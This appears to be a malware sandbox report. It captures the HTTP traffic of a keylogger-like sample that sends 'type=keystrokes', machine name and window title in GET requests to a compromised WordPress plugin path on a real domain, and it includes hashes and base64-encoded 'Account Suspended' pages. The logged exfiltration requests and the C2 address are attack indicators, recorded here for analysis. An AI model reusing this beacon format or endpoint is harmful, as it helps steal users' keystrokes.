YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=2:55%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Fri, 02 Dec 2016 22:55:09 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
40 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=2:55%20PM text/html post.php 302 Found HTML 379.0 B 03/22/60 12:08:54
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9QzolNUNVc2VycyU1Q0FkbWluaXN0cmF0b3IlNUNE
ZXNrdG9wJTVDbWFsd2FyZSZhbXA7a2V5c3Ryb2tlc3R5cGVkPSZhbXA7bWFjaGluZXRpbWU9Mjo1
NSUyMFBNIj5oZXJlPC9hPi48L3A+CjwvYm9keT48L2h0bWw+Cg==
Download
Download
SHA256
d3adb01cfef90704ca5c41efb5c4ec34e49355322a648a2dd32048111b4cad2e
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=2:55%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 302 Found
Date: Fri, 02 Dec 2016 22:55:10 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=2:55%20PM
Content-Length: 379
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
41 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=2:55%20PM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 03/22/60 12:49:04
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
